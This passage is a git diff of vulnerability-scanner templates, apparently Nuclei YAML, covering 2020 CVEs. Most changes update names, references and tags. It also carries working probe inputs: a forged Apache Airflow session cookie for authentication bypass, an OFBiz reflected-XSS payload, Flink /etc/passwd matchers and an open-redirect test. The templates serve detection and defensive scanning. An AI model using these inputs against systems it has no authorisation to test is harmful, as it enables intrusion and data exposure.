diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml
index a206346e8a..cf5468f60b 100644
--- a/cves/2020/CVE-2020-16139.yaml
+++ b/cves/2020/CVE-2020-16139.yaml
@@ -1,18 +1,22 @@
 id: CVE-2020-16139
 
 info:
-  name: Cisco 7937G Denial-of-Service Reboot Attack
+  name: Cisco Unified IP Conference Station 7937G - Denial-of-Service
   author: pikpikcu
   severity: high
   description: |
-    A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.
+    Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.
   reference:
     - https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
+    - http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html
+    - https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
+    - https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-16139
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
     cvss-score: 7.5
     cve-id: CVE-2020-16139
-  tags: cve,cve2020,dos,cisco
+  tags: cve,cve2020,dos,cisco,packetstorm
 
 requests:
   - raw:
@@ -31,4 +35,6 @@ requests:
           - "application/xml"
       - type: word
         words:
-          - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
\ No newline at end of file
+          - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-16846.yaml b/cves/2020/CVE-2020-16846.yaml
index d68e6c8823..8114872351 100644
--- a/cves/2020/CVE-2020-16846.yaml
+++ b/cves/2020/CVE-2020-16846.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-16846
     cwe-id: CWE-78
-  tags: cve,cve2020,saltstack
+  tags: vulhub,cve,cve2020,saltstack,kev
 
 requests:
   - method: POST
diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml
index 55eec4cab2..314af66e91 100644
--- a/cves/2020/CVE-2020-16952.yaml
+++ b/cves/2020/CVE-2020-16952.yaml
@@ -1,20 +1,21 @@
 id: CVE-2020-16952
 
 info:
-  name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE
+  name: Microsoft SharePoint - Remote Code Execution
   author: dwisiswant0
   severity: high
-  description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'.
+  description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package.
   reference:
     - https://srcincite.io/pocs/cve-2020-16952.py.txt
     - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
     - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-16952
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 7.8
     cve-id: CVE-2020-16952
     cwe-id: CWE-346
-  tags: cve,cve2020,sharepoint,iis,microsoft,ssi,rce
+  tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce
 
 requests:
   - method: GET
@@ -41,3 +42,5 @@ requests:
           - 200
           - 201
         condition: or
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml
index 54ec889175..45e363b48f 100644
--- a/cves/2020/CVE-2020-17362.yaml
+++ b/cves/2020/CVE-2020-17362.yaml
@@ -1,19 +1,20 @@
 id: CVE-2020-17362
 
 info:
-  name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting
+  name: Nova Lite < 1.3.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.
   reference:
     - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
     - https://nvd.nist.gov/vuln/detail/CVE-2020-17362
+    - https://themes.trac.wordpress.org/browser/nova-lite/1.3.9/readme.txt?rev=134076
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-17362
     cwe-id: CWE-79
-  tags: cve,cve2020,wordpress,xss,wp-plugin
+  tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml
index e8c4dc4f04..ba1f0613e1 100644
--- a/cves/2020/CVE-2020-17453.yaml
+++ b/cves/2020/CVE-2020-17453.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
     - https://nvd.nist.gov/vuln/detail/CVE-2020-17453
+    - https://twitter.com/JacksonHHax/status/1374681422678519813
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml
index 2fb09ea2fa..fba91c11a2 100644
--- a/cves/2020/CVE-2020-17456.yaml
+++ b/cves/2020/CVE-2020-17456.yaml
@@ -4,16 +4,17 @@ info:
   name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution
   author: gy741,edoardottt
   severity: critical
-  description: "SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page."
+  description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.
   reference:
     - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-17456
+    - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-17456
     cwe-id: CWE-78
-  tags: rce,seowon,router,unauth,iot,cve,cve2020,oast
+  tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml
index cad81a13d8..ef65ec4369 100644
--- a/cves/2020/CVE-2020-17496.yaml
+++ b/cves/2020/CVE-2020-17496.yaml
@@ -4,16 +4,18 @@ info:
   name: vBulletin 5.5.4 - 5.6.2- Remote Command Execution
   author: pussycat0x
   severity: critical
-  description: "vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759."
+  description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'
   reference:
     - https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
     - https://nvd.nist.gov/vuln/detail/CVE-2020-17496
+    - https://seclists.org/fulldisclosure/2020/Aug/5
+    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-17496
     cwe-id: CWE-74
-  tags: cve,cve2020,vbulletin,rce
+  tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml
index 1de8352541..de43b60d33 100644
--- a/cves/2020/CVE-2020-17505.yaml
+++ b/cves/2020/CVE-2020-17505.yaml
@@ -1,18 +1,20 @@
 id: CVE-2020-17505
 
 info:
-  name: Artica Web Proxy 4.30 OS Command Injection
+  name: Artica Web Proxy 4.30 - OS Command Injection
   author: dwisiswant0
   severity: high
-  description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
+  description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
   reference:
     - https://blog.max0x4141.com/post/artica_proxy/
+    - http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-17505
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-17505
     cwe-id: CWE-78
-  tags: cve,cve2020,rce,artica,proxy
+  tags: proxy,packetstorm,cve,cve2020,rce,artica
 
 requests:
   - raw:
@@ -40,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml
index b0d7e9d074..256eee5598 100644
--- a/cves/2020/CVE-2020-17506.yaml
+++ b/cves/2020/CVE-2020-17506.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://blog.max0x4141.com/post/artica_proxy/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506
+    - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-17506
     cwe-id: CWE-89
-  tags: cve,cve2020,artica,proxy
+  tags: cve,cve2020,artica,proxy,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml
index a9cd89f2a8..31b0b89878 100644
--- a/cves/2020/CVE-2020-17518.yaml
+++ b/cves/2020/CVE-2020-17518.yaml
@@ -1,20 +1,24 @@
 id: CVE-2020-17518
 
 info:
-  name: Apache Flink Upload Path Traversal
+  name: Apache Flink 1.5.1 - Local File Inclusion
   author: pdteam
   severity: high
   description: |
-    Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system,
-    through a maliciously modified HTTP HEADER.
+    Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
+    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E
+    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cuser.flink.apache.org%3E
+    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cdev.flink.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-17518
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-17518
     cwe-id: CWE-22
-  tags: cve,cve2020,apache,lfi,flink,upload
+  tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive
+
 
 requests:
   - raw:
@@ -38,3 +42,5 @@ requests:
       - type: dsl
         dsl:
           - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml
index 523f761958..49e8144891 100644
--- a/cves/2020/CVE-2020-17519.yaml
+++ b/cves/2020/CVE-2020-17519.yaml
@@ -1,12 +1,16 @@
 id: CVE-2020-17519
 
 info:
-  name: Apache Flink directory traversal
+  name: Apache Flink - Local File Inclusion
   author: pdteam
   severity: high
-  description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
+  description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
   reference:
     - https://github.com/B1anda0/CVE-2020-17519
+    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
+    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
+    - https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-17519
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -27,3 +31,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-17526.yaml b/cves/2020/CVE-2020-17526.yaml
new file mode 100644
index 0000000000..031af8b6a7
--- /dev/null
+++ b/cves/2020/CVE-2020-17526.yaml
@@ -0,0 +1,51 @@
+id: CVE-2020-17526
+
+info:
+  name: Apache Airflow < 1.10.14 - Authentication Bypass
+  author: piyushchhiroliya
+  severity: high
+  description: |
+    Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
+  reference:
+    - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-17526
+    - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
+    - http://www.openwall.com/lists/oss-security/2020/12/21/1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 7.7
+    cve-id: CVE-2020-17526
+  metadata:
+    fofa-query: Apache Airflow
+    verified: "true"
+  tags: cve,cve2020,apache,airflow,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /admin/ HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /admin/ HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "DAG"
+          - "Recent Tasks"
+          - "Users"
+          - "SLA Misses"
+          - "Task Instances"
+        condition: and
+
+      - type: dsl
+        dsl:
+          - "contains(body_1, 'Redirecting...')"
+          - "status_code_1 == 302"
+        condition: and
diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml
index c39f87389c..a2f8cf4382 100644
--- a/cves/2020/CVE-2020-17530.yaml
+++ b/cves/2020/CVE-2020-17530.yaml
@@ -16,7 +16,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-17530
     cwe-id: CWE-917
-  tags: cve,cve2020,apache,rce,struts
+  tags: cve,cve2020,apache,rce,struts,kev,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-18268.yaml b/cves/2020/CVE-2020-18268.yaml
index 4b2fb2686d..30e754c8d8 100644
--- a/cves/2020/CVE-2020-18268.yaml
+++ b/cves/2020/CVE-2020-18268.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://github.com/zblogcn/zblogphp/issues/216
     - https://www.cvedetails.com/cve/CVE-2020-18268
+    - https://github.com/zblogcn/zblogphp/issues/209
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -27,7 +28,7 @@ requests:
         btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
 
       - |
-        GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
+        GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
         Host: {{Hostname}}
 
     cookie-reuse: true
@@ -35,4 +36,4 @@ requests:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2020/CVE-2020-19282.yaml b/cves/2020/CVE-2020-19282.yaml
index 74921b3b4a..93069cfd34 100644
--- a/cves/2020/CVE-2020-19282.yaml
+++ b/cves/2020/CVE-2020-19282.yaml
@@ -1,12 +1,13 @@
 id: CVE-2020-19282
 
 info:
-  name: Jeesns 1.4.2 XSS
+  name: Jeesns 1.4.2 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.
+  description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.
   reference:
     - https://github.com/zchuanzhao/jeesns/issues/11
+    - https://www.seebug.org/vuldb/ssvid-97940
     - https://nvd.nist.gov/vuln/detail/CVE-2020-19282
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -36,3 +37,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-19283.yaml b/cves/2020/CVE-2020-19283.yaml
index 409f52f16e..fd87db4bc9 100644
--- a/cves/2020/CVE-2020-19283.yaml
+++ b/cves/2020/CVE-2020-19283.yaml
@@ -1,12 +1,13 @@
 id: CVE-2020-19283
 
 info:
-  name: Jeesns newVersion Reflection XSS
+  name: Jeesns 1.4.2 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Reflected cross-site scripting (XSS) vulnerability in the /newVersion component of Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML.
+  description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /newVersion component and allows attackers to execute arbitrary web scripts or HTML.
   reference:
     - https://github.com/zchuanzhao/jeesns/issues/10
+    - https://www.seebug.org/vuldb/ssvid-97939
     - https://nvd.nist.gov/vuln/detail/CVE-2020-19283
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -36,3 +37,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-19295.yaml b/cves/2020/CVE-2020-19295.yaml
index 7575f96f63..8f12471bc4 100644
--- a/cves/2020/CVE-2020-19295.yaml
+++ b/cves/2020/CVE-2020-19295.yaml
@@ -1,12 +1,13 @@
 id: CVE-2020-19295
 
 info:
-  name: Jeesns Weibo Topic Reflection XSS
+  name: Jeesns 1.4.2 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.
+  description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.
   reference:
     - https://github.com/zchuanzhao/jeesns/issues/21
+    - https://www.seebug.org/vuldb/ssvid-97950
     - https://nvd.nist.gov/vuln/detail/CVE-2020-19295
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -36,3 +37,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-19360.yaml b/cves/2020/CVE-2020-19360.yaml
index 64a9b6aa1b..cd05632a86 100644
--- a/cves/2020/CVE-2020-19360.yaml
+++ b/cves/2020/CVE-2020-19360.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md
     - https://www.cvedetails.com/cve/CVE-2020-19360/
+    - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
+    - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml
index 563a4eca71..b09c2972e7 100644
--- a/cves/2020/CVE-2020-1938.yaml
+++ b/cves/2020/CVE-2020-1938.yaml
@@ -8,12 +8,16 @@ info:
   reference:
     - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
     - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
+    - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
+    - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-1938
     cwe-id: CWE-269
-  tags: cve,cve2020,apache,tomcat,lfi,network
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: cisa,tenable,cve2020,apache,lfi,network,kev,cve,tomcat
 
 network:
   - inputs:
diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml
index 90fd65c3cb..2c96e60b53 100644
--- a/cves/2020/CVE-2020-1943.yaml
+++ b/cves/2020/CVE-2020-1943.yaml
@@ -1,12 +1,16 @@
 id: CVE-2020-1943
 
 info:
-  name: Apache OFBiz Reflected XSS
+  name: Apache OFBiz <=16.11.07 - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.
+  description: Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.
   reference:
     - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E
+    - https://s.apache.org/pr5u8
+    - https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E
+    - https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-1943
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -17,13 +21,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
+      - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<svg/onload=alert(xss)>"
+          - "<svg/onload=alert(/xss/)>"
         part: body
 
       - type: word
@@ -34,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml
index 09b2132868..eaad72228d 100644
--- a/cves/2020/CVE-2020-19625.yaml
+++ b/cves/2020/CVE-2020-19625.yaml
@@ -9,6 +9,7 @@ info:
   reference:
     - https://github.com/oria/gridx/issues/433
     - https://nvd.nist.gov/vuln/detail/CVE-2020-19625
+    - http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml
index af7ca73531..4b74fc8d77 100644
--- a/cves/2020/CVE-2020-2036.yaml
+++ b/cves/2020/CVE-2020-2036.yaml
@@ -1,13 +1,15 @@
 id: CVE-2020-2036
 
 info:
-  name: Palo Alto Networks Reflected XSS
+  name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting
   author: madrobot
   severity: high
   description: |
-    A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
+    PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
   reference:
     - https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+    - https://security.paloaltonetworks.com/CVE-2020-2036
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-2036
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -37,3 +39,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml
index 1b9d06927a..ca04c04738 100644
--- a/cves/2020/CVE-2020-2096.yaml
+++ b/cves/2020/CVE-2020-2096.yaml
@@ -1,14 +1,15 @@
 id: CVE-2020-2096
 
 info:
-  name: Jenkins Gitlab Hook XSS
+  name: Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
+  description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability.
   reference:
     - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
     - http://www.openwall.com/lists/oss-security/2020/01/15/1
     - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-2096
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -16,7 +17,7 @@ info:
     cwe-id: CWE-79
   metadata:
     shodan-query: http.title:"GitLab"
-  tags: cve,cve2020,jenkins,xss,gitlab,plugin
+  tags: jenkins,xss,gitlab,plugin,packetstorm,cve,cve2020
 
 requests:
   - method: GET
@@ -38,3 +39,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-20982.yaml b/cves/2020/CVE-2020-20982.yaml
index 0c9b36e71f..e53cbc1ccc 100644
--- a/cves/2020/CVE-2020-20982.yaml
+++ b/cves/2020/CVE-2020-20982.yaml
@@ -2,12 +2,14 @@ id: CVE-2020-20982
 
 info:
